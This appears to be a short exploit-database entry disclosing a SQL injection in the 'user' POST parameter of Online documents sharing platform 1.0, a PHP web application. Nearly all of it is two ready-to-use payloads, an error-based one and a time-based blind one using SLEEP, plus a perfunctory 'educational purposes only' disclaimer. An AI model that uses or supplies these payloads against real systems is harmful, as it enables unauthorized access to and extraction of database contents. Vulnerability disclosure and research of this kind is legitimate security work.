Exploits / Vulnerability Discovered : 2021-01-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Online documents sharing platform 1.0 user sql injection is for educational purposes only and if it is used you will do on your own risk!
Parameter: user (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: user=' AND (SELECT 2047 FROM(SELECT
COUNT(*),CONCAT(0x7176706a71,(SELECT
(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)--
HnhM&pass='&login=login
Online documents sharing platform 1.0 user sql injection